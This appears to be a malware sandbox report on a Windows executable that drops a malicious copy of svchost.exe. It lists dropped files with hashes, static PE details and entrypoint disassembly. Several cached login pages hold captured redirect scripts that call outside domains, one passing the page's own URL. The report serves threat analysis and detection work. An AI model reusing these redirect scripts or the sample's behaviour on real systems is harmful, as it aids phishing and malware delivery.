                                                                                                                                                                                                            SHA1:61A2BE21E713554AF95AA2A321E61F02ADF684D7
                                                                                                                                                                                                            SHA-256:1E6FCC2186272762C3BF9CC8BA06F7CA7CB5EFA5215BDAEB5FF19799B51D3FEA
                                                                                                                                                                                                            SHA-512:9854166756AAAD6FCFF615F4D83985EBCCDFD1F0BF5F0B0910E5850F7F362BDC3D4765260A334E2201B6B0A5B64446D8C4B11A2549549C6D45F1ED1756ADEC22
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="490922" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                                                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER6357.tmp.WERInternalMetadata.xml

                                                                                                                                                                                                            Download File
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):8364
                                                                                                                                                                                                            Entropy (8bit):3.7014070710191356
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:R6l7wVeJak6vNJ/C6Y9uSUONgmfKBprx89bEqsf0omsm:R6lXJR6W6Y0SUONgmfKSEJfY
                                                                                                                                                                                                            MD5:FCDC803303E5C1A9BB342DFC4646E0F8
                                                                                                                                                                                                            SHA1:8066ED2BD2D5B04CDCAAA6720766F7AD5000DE62
                                                                                                                                                                                                            SHA-256:DEB1FA094DE236E4FDE0EBE444D70837C485C598DC3AEB84DFFB22F4992E941A
                                                                                                                                                                                                            SHA-512:3C5E188063E6D00D7C199A04B926DF373EC6F1AB23B3EFA53C6D051445C56FBA1E15EC0C82868056E7B793949E78D4D98F23BB3D90C00A1DCB20C3D9B2571626
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.8.2.8.<./.P.i.

                                                                                                                                                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER6387.tmp.xml

                                                                                                                                                                                                            Download File
                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):4629
                                                                                                                                                                                                            Entropy (8bit):4.49732569373984
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:cvIwWl8zsKJg77aI9BeWpW8VYlYm8M4JUqFh+q8K6Bz9/ed:uIjfYI7Df7VVJfq9led
                                                                                                                                                                                                            MD5:5E660CDA438AFEB3058A9486DE73BDE4
                                                                                                                                                                                                            SHA1:3FD860A9DE74FF2749FB1DADA9C628072616612C
                                                                                                                                                                                                            SHA-256:754DB16BD05605A067B88691111F9E27FBBFAB02BC1917DC1858E13EDECAD238
                                                                                                                                                                                                            SHA-512:E40065ED8A180C3B1EA0D6E43C39B3355979A0B4B34D6830BEBE22D848E1BB9FAD58FFFA82C08F7DB92BB3F74F42BE4E3EADCCCC60502CB94F435F2421A79D31
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="490922" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\login[3].htm

                                                                                                                                                                                                            Download File
                                                                                                                                                                                                            Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            File Type:HTML document, ASCII text
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):593
                                                                                                                                                                                                            Entropy (8bit):4.470551863591405
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12:ZM1YKxs2A3aoJSw259ExxClHIlRBnNqKDuI1CA94IQL:ZM1y3aoJ7259EoolRHqFI8k4j
                                                                                                                                                                                                            MD5:3B03D93D3487806337B5C6443CE7A62D
                                                                                                                                                                                                            SHA1:93A7A790BB6348606CBDAF5DAEAAF4EA8CF731D0
                                                                                                                                                                                                            SHA-256:7392749832C70FCFC2D440D7AFC2F880000DD564930D95D634EB1199FA15DE30
                                                                                                                                                                                                            SHA-512:770977BEAEEDAFC5C98D0C32EDC8C6C850F05E9F363BC9997FA73991646B02E5D40CEED0017B06CAEAB0DB86423844BC4B0A9F0DF2D8239230E423A7BFBD4A88
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:<html>.<head>. <meta http-equiv="refresh" content="5;url=https://nojs.domaincntrol.com" />.</head>.<body>. <script>. let retries = 3, interval = 1000;. (function retry() {. fetch("https://domaincntrol.com/?orighost=" + window.location.href). .then(response => response.json()). .then(data => window.location.href = data). .catch(error => {. if (retries > 0) {. retries--;. setTimeout(retry, interval);. } else {. console.error("Error: ", error);. }. });. })();. </script>.</body>.</html>.

                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\login[1].htm

                                                                                                                                                                                                            Download File
                                                                                                                                                                                                            Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):173
                                                                                                                                                                                                            Entropy (8bit):4.43096450882803
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:qVoB3tUROGclXqyvXboAcMBXqWSZUXqXlIVLLP61IwcWWGpvGyy:q43tISl6kXiMIWSU6XlI5LP8IpfGpfy
                                                                                                                                                                                                            MD5:7A5DF79FBAAFF2C161C6E29461785403
                                                                                                                                                                                                            SHA1:89B90DFB141E4B0F97D15FEB34A49F9EEC64DC52
                                                                                                                                                                                                            SHA-256:B1C52A7C21C4B21BF69866D7859284068D6ECC90306FE22076F81DAA0176A7ED
                                                                                                                                                                                                            SHA-512:19F00A755F34E3770F1DD0AB698056BF60E802EE7E941662054CF61565A8C06639C3AAFE1E93B0BBF446D9F7D08F5E827648311703E8718252597B78734960A5
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:<html>..<head><title>301 Moved Permanently</title></head>..<body>..<center><h1>301 Moved Permanently</h1></center>..<hr><center>nginx</center>..</body>..</html>..l>....0....

                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\login[2].htm

                                                                                                                                                                                                            Download File
                                                                                                                                                                                                            Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):173
                                                                                                                                                                                                            Entropy (8bit):4.43096450882803
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:qVoB3tUROGclXqyvXboAcMBXqWSZUXqXlIVLLP61IwcWWGpvGyy:q43tISl6kXiMIWSU6XlI5LP8IpfGpfy
                                                                                                                                                                                                            MD5:7A5DF79FBAAFF2C161C6E29461785403
                                                                                                                                                                                                            SHA1:89B90DFB141E4B0F97D15FEB34A49F9EEC64DC52
                                                                                                                                                                                                            SHA-256:B1C52A7C21C4B21BF69866D7859284068D6ECC90306FE22076F81DAA0176A7ED
                                                                                                                                                                                                            SHA-512:19F00A755F34E3770F1DD0AB698056BF60E802EE7E941662054CF61565A8C06639C3AAFE1E93B0BBF446D9F7D08F5E827648311703E8718252597B78734960A5
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:<html>..<head><title>301 Moved Permanently</title></head>..<body>..<center><h1>301 Moved Permanently</h1></center>..<hr><center>nginx</center>..</body>..</html>..l>....0....

                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\login[3].htm

                                                                                                                                                                                                            Download File
                                                                                                                                                                                                            Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            File Type:HTML document, ASCII text, with no line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):114
                                                                                                                                                                                                            Entropy (8bit):4.802925647778009
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:PouVIZx/XMn30EEBuvFfD0OkADYyT0NV9kBbZWM:hax/XW3/p5mmYyT0NVuB9d
                                                                                                                                                                                                            MD5:E89F75F918DBDCEE28604D4E09DD71D7
                                                                                                                                                                                                            SHA1:F9D9055E9878723A12063B47D4A1A5F58C3EB1E9
                                                                                                                                                                                                            SHA-256:6DC9C7FC93BB488BB0520A6C780A8D3C0FB5486A4711ACA49B4C53FAC7393023
                                                                                                                                                                                                            SHA-512:8DF0AB2E3679B64A6174DEFF4259AE5680F88E3AE307E0EA2DFFF88EC4BA14F3477C9FE3A5AA5DA3A8E857601170A5108ED75F6D6975958AC7A314E4A336AED0
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:<!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander"}</script></head></html>

                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\login[1].htm

                                                                                                                                                                                                            Download File
                                                                                                                                                                                                            Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            File Type:HTML document, ASCII text, with no line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):114
                                                                                                                                                                                                            Entropy (8bit):4.802925647778009
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:PouVIZx/XMn30EEBuvFfD0OkADYyT0NV9kBbZWM:hax/XW3/p5mmYyT0NVuB9d
                                                                                                                                                                                                            MD5:E89F75F918DBDCEE28604D4E09DD71D7
                                                                                                                                                                                                            SHA1:F9D9055E9878723A12063B47D4A1A5F58C3EB1E9
                                                                                                                                                                                                            SHA-256:6DC9C7FC93BB488BB0520A6C780A8D3C0FB5486A4711ACA49B4C53FAC7393023
                                                                                                                                                                                                            SHA-512:8DF0AB2E3679B64A6174DEFF4259AE5680F88E3AE307E0EA2DFFF88EC4BA14F3477C9FE3A5AA5DA3A8E857601170A5108ED75F6D6975958AC7A314E4A336AED0
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:<!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander"}</script></head></html>

                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\login[1].php

                                                                                                                                                                                                            Download File
                                                                                                                                                                                                            Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):11
                                                                                                                                                                                                            Entropy (8bit):3.0957952550009344
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:0MXAG3n:0MQa
                                                                                                                                                                                                            MD5:32682312D17C7CBF18E73594F5570319
                                                                                                                                                                                                            SHA1:60E22121BDD0BC71CDB2BAE2A3AA577006B2EAE9
                                                                                                                                                                                                            SHA-256:E55FB1A1D731153E943B68844AF12DCCE8BFAC917C98FFDEA64C80DA0607DD47
                                                                                                                                                                                                            SHA-512:68337DEBB9CD659CECE621AF582AE2BC4B56B9CF06B26C45F4D9EB8BEB91D3F36BEAD287218B5AA2BB4853A1CF1A12017CA57318D7E12F489884FDC6B261DFC1
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:Redirecting

                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\login[3].htm

                                                                                                                                                                                                            Download File
                                                                                                                                                                                                            Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            File Type:HTML document, ASCII text
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):593
                                                                                                                                                                                                            Entropy (8bit):4.470551863591405
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12:ZM1YKxs2A3aoJSw259ExxClHIlRBnNqKDuI1CA94IQL:ZM1y3aoJ7259EoolRHqFI8k4j
                                                                                                                                                                                                            MD5:3B03D93D3487806337B5C6443CE7A62D
                                                                                                                                                                                                            SHA1:93A7A790BB6348606CBDAF5DAEAAF4EA8CF731D0
                                                                                                                                                                                                            SHA-256:7392749832C70FCFC2D440D7AFC2F880000DD564930D95D634EB1199FA15DE30
                                                                                                                                                                                                            SHA-512:770977BEAEEDAFC5C98D0C32EDC8C6C850F05E9F363BC9997FA73991646B02E5D40CEED0017B06CAEAB0DB86423844BC4B0A9F0DF2D8239230E423A7BFBD4A88
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:<html>.<head>. <meta http-equiv="refresh" content="5;url=https://nojs.domaincntrol.com" />.</head>.<body>. <script>. let retries = 3, interval = 1000;. (function retry() {. fetch("https://domaincntrol.com/?orighost=" + window.location.href). .then(response => response.json()). .then(data => window.location.href = data). .catch(error => {. if (retries > 0) {. retries--;. setTimeout(retry, interval);. } else {. console.error("Error: ", error);. }. });. })();. </script>.</body>.</html>.

                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\login[4].htm

                                                                                                                                                                                                            Download File
                                                                                                                                                                                                            Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):162
                                                                                                                                                                                                            Entropy (8bit):4.43530643106624
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:qVoB3tUROGclXqyvXboAcMBXqWSZUXqXlIVLLP61IwcWWGu:q43tISl6kXiMIWSU6XlI5LP8IpfGu
                                                                                                                                                                                                            MD5:4F8E702CC244EC5D4DE32740C0ECBD97
                                                                                                                                                                                                            SHA1:3ADB1F02D5B6054DE0046E367C1D687B6CDF7AFF
                                                                                                                                                                                                            SHA-256:9E17CB15DD75BBBD5DBB984EDA674863C3B10AB72613CF8A39A00C3E11A8492A
                                                                                                                                                                                                            SHA-512:21047FEA5269FEE75A2A187AA09316519E35068CB2F2F76CFAF371E5224445E9D5C98497BD76FB9608D2B73E9DAC1A3F5BFADFDC4623C479D53ECF93D81D3C9F
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:<html>..<head><title>301 Moved Permanently</title></head>..<body>..<center><h1>301 Moved Permanently</h1></center>..<hr><center>nginx</center>..</body>..</html>..

                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\login[5].htm

                                                                                                                                                                                                            Download File
                                                                                                                                                                                                            Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            File Type:HTML document, ASCII text, with very long lines (481), with no line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):481
                                                                                                                                                                                                            Entropy (8bit):5.791950481930078
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12:kxvsCk9cE3MxlVT/X2irJIQ6V6gRl5nKnYI:kbxxlVT/GHogR2YI
                                                                                                                                                                                                            MD5:CAB79F65957EB7B5F39C4A297DD09B6E
                                                                                                                                                                                                            SHA1:570526FE1CCB4B08D296771C81EF7ACAA059F8FA
                                                                                                                                                                                                            SHA-256:460AEA92C0FE496F9BF6243BD67227BB8644F3FDC5DA3DF834A6DFA73DCE5A82
                                                                                                                                                                                                            SHA-512:E83C5AC78FCED8F3FF1B026C0C1935B56E9D93D2D88A3FEB74328917D8CFFA1DB3FFC367545D4D1BB55B8723F9D09EFABEC51203C78142B5E1D67341DA083AF1
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:<html><head><title>Loading...</title></head><body><script type='text/javascript'>window.location.replace('http://lysyfyj.com/login.php?ch=1&js=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdWQiOiJKb2tlbiIsImV4cCI6MTcyNTc4NjAxMSwiaWF0IjoxNzI1Nzc4ODExLCJpc3MiOiJKb2tlbiIsImpzIjoxLCJqdGkiOiIydnBqNWJzMXI2MTdhMnE3aGsxOTdoczMiLCJuYmYiOjE3MjU3Nzg4MTEsInRzIjoxNzI1Nzc4ODExNTkyMDcyfQ.E82c0P2hrG2LmDTMCBwILDVtlaljPVneA8HN5jqC4YQ&sid=cabcb30f-6daf-11ef-bf0d-9c5eae0a9761');</script></body></html>

                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\login[3].htm

                                                                                                                                                                                                            Download File
                                                                                                                                                                                                            Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):162
                                                                                                                                                                                                            Entropy (8bit):4.43530643106624
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:qVoB3tUROGclXqyvXboAcMBXqWSZUXqXlIVLLP61IwcWWGu:q43tISl6kXiMIWSU6XlI5LP8IpfGu
                                                                                                                                                                                                            MD5:4F8E702CC244EC5D4DE32740C0ECBD97
                                                                                                                                                                                                            SHA1:3ADB1F02D5B6054DE0046E367C1D687B6CDF7AFF
                                                                                                                                                                                                            SHA-256:9E17CB15DD75BBBD5DBB984EDA674863C3B10AB72613CF8A39A00C3E11A8492A
                                                                                                                                                                                                            SHA-512:21047FEA5269FEE75A2A187AA09316519E35068CB2F2F76CFAF371E5224445E9D5C98497BD76FB9608D2B73E9DAC1A3F5BFADFDC4623C479D53ECF93D81D3C9F
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:<html>..<head><title>301 Moved Permanently</title></head>..<body>..<center><h1>301 Moved Permanently</h1></center>..<hr><center>nginx</center>..</body>..</html>..

                                                                                                                                                                                                            C:\Windows\apppatch\svchost.exe

                                                                                                                                                                                                            Download File
                                                                                                                                                                                                            Process:C:\Users\user\Desktop\5AFlyarMds.exe
                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                            Category:modified
                                                                                                                                                                                                            Size (bytes):216064
                                                                                                                                                                                                            Entropy (8bit):7.812400781396835
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:6144:lmKVGe1XIpQiU/ma3MB8hH2Tkp6bYnWcZVol0N5TzQ3:971YpQiU/RcO1VQInVob
                                                                                                                                                                                                            MD5:9A96CBEB34AD570586652BD7772616D6
                                                                                                                                                                                                            SHA1:536058D8CF9682014FC449DEF46FADD24B38B160
                                                                                                                                                                                                            SHA-256:5F95753D6C0E92FE324B77AA44416451125B09ED3127674E1825DA59ED384E31
                                                                                                                                                                                                            SHA-512:B257BA41E71BF5D8718352746B2E16AFCCE3CA96BE8E29EC893EF623EBB897CFA48D0790BF7345F0FDE0371191177779A0605BF8FE03E836CA571882AD56EA0D
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....`B........................K...&........ ....@....................................-............................................................................`e...............................................................................text....-.......................... ..`.lm..........@.......2..............@....qaQL................6..............@....yP.....+............>..............@..@.bPUeWG..R...........L..............@..@.PaB.................T..............@....data...%8... ...:...X..............@....dOh.........`......................@....HvNW...$...........................@..@.pPJb....x...0......................@..@.bBut....=..........................@....rsrc...............................@..@.reloc...............H..............@..B........................................................................................................

                                                                                                                                                                                                            C:\Windows\apppatch\svchost.exe:Zone.Identifier

                                                                                                                                                                                                            Download File
                                                                                                                                                                                                            Process:C:\Users\user\Desktop\5AFlyarMds.exe
                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):26
                                                                                                                                                                                                            Entropy (8bit):3.95006375643621
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                            MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Preview:[ZoneTransfer]....ZoneId=0

                                                                                                                                                                                                            Static File Info

                                                                                                                                                                                                            General

                                                                                                                                                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                            Entropy (8bit):7.8124014759481
                                                                                                                                                                                                            TrID:
                                                                                                                                                                                                            • Win32 Executable (generic) a (10002005/4) 99.83%
                                                                                                                                                                                                            • Windows Screen Saver (13104/52) 0.13%
                                                                                                                                                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                            File name:5AFlyarMds.exe
                                                                                                                                                                                                            File size:216'064 bytes
                                                                                                                                                                                                            MD5:fcf6de7351633752cf96e861d60b2a8c
                                                                                                                                                                                                            SHA1:548662dfac5acd8306b09d0af1385b6615b423da
                                                                                                                                                                                                            SHA256:def2f0b62f4af989da3cd943e3120ed81c9fb24979925faac774cca11eb2ea54
                                                                                                                                                                                                            SHA512:0365c358f470843623ab0d425adc53e27027a82e02f800629c54f2913d285f827c85bb35f103743b2a4664cb24fe92f0f1f152bea1eedd341cb9f5c6011325b0
                                                                                                                                                                                                            SSDEEP:6144:+mKVGe1XIpQiU/ma3MB8hH2Tkp6bYnWcZVol0N5TzQ3:w71YpQiU/RcO1VQInVob
                                                                                                                                                                                                            TLSH:362413226D5D4E63C6A714BB1BF6FF552326E5A8432BC7676C00420F0C756C97F3AAA0
                                                                                                                                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....`B........................K...&........ ....@....................................%...................................

                                                                                                                                                                                                            File Icon

                                                                                                                                                                                                            Icon Hash:000ad5f5359575b5

                                                                                                                                                                                                            Static PE Info

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Entrypoint:0x401c26
                                                                                                                                                                                                            Entrypoint Section:.text
                                                                                                                                                                                                            Digitally signed:false
                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                            Subsystem:windows gui
                                                                                                                                                                                                            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                                                                                                                            DLL Characteristics:
                                                                                                                                                                                                            Time Stamp:0x426083DE [Sat Apr 16 03:17:50 2005 UTC]
                                                                                                                                                                                                            TLS Callbacks:
                                                                                                                                                                                                            CLR (.Net) Version:
                                                                                                                                                                                                            OS Version Major:4
                                                                                                                                                                                                            OS Version Minor:0
                                                                                                                                                                                                            File Version Major:4
                                                                                                                                                                                                            File Version Minor:0
                                                                                                                                                                                                            Subsystem Version Major:4
                                                                                                                                                                                                            Subsystem Version Minor:0
                                                                                                                                                                                                            Import Hash:088303a3216315a2ba8d66c94c7b80a0

                                                                                                                                                                                                            Entrypoint Preview

                                                                                                                                                                                                            Instruction
                                                                                                                                                                                                            mov eax, 0000720Ah
                                                                                                                                                                                                            xor ecx, ecx
                                                                                                                                                                                                            push ecx
                                                                                                                                                                                                            xor edx, edx
                                                                                                                                                                                                            push edx
                                                                                                                                                                                                            call dword ptr [0040F0B0h]
                                                                                                                                                                                                            mov dword ptr [0042257Ah], eax
                                                                                                                                                                                                            xor eax, eax
                                                                                                                                                                                                            lea eax, dword ptr [ebx+00422446h]
                                                                                                                                                                                                            mov ecx, eax
                                                                                                                                                                                                            add ecx, dword ptr [0042206Eh]
                                                                                                                                                                                                            shl ecx, 04h
                                                                                                                                                                                                            add ecx, dword ptr [004229DCh]
                                                                                                                                                                                                            dec ecx
                                                                                                                                                                                                            sub ecx, 00000F4Bh
                                                                                                                                                                                                            sub ecx, ebx
                                                                                                                                                                                                            add ecx, dword ptr [00422565h]
                                                                                                                                                                                                            shr ecx, 04h
                                                                                                                                                                                                            add dword ptr [00422635h], ecx
                                                                                                                                                                                                            call 00007EFC890679DBh
                                                                                                                                                                                                            mov dword ptr [00422C61h], eax
                                                                                                                                                                                                            mov ebp, 00000000h
                                                                                                                                                                                                            mov ecx, ebp
                                                                                                                                                                                                            push ecx
                                                                                                                                                                                                            push 000B1DB0h
                                                                                                                                                                                                            pop ebx
                                                                                                                                                                                                            mov eax, 0035D258h
                                                                                                                                                                                                            add ebx, eax
                                                                                                                                                                                                            mov ebx, dword ptr [ebx]
                                                                                                                                                                                                            call ebx
                                                                                                                                                                                                            mov esi, 0000D9A1h
                                                                                                                                                                                                            mov eax, esi
                                                                                                                                                                                                            mov dword ptr [00422FD4h], 0041548Ah
                                                                                                                                                                                                            add eax, dword ptr [00422FD4h]
                                                                                                                                                                                                            push eax
                                                                                                                                                                                                            mov eax, 00000022h
                                                                                                                                                                                                            mov edx, eax
                                                                                                                                                                                                            push edx
                                                                                                                                                                                                            push 00000013h
                                                                                                                                                                                                            pop ecx
                                                                                                                                                                                                            push ecx
                                                                                                                                                                                                            push 00000009h
                                                                                                                                                                                                            pop ebx
                                                                                                                                                                                                            push ebx
                                                                                                                                                                                                            mov edi, 00051EB5h
                                                                                                                                                                                                            mov eax, edi
                                                                                                                                                                                                            add eax, 003BD29Bh
                                                                                                                                                                                                            push dword ptr [eax]
                                                                                                                                                                                                            pop dword ptr [00422F27h]
                                                                                                                                                                                                            mov eax, dword ptr [00422F27h]
                                                                                                                                                                                                            call eax
                                                                                                                                                                                                            mov dword ptr [004221ECh], eax
                                                                                                                                                                                                            or eax, eax
                                                                                                                                                                                                            jne 00007EFC89066A66h
                                                                                                                                                                                                            xor esi, ebx
                                                                                                                                                                                                            not edi
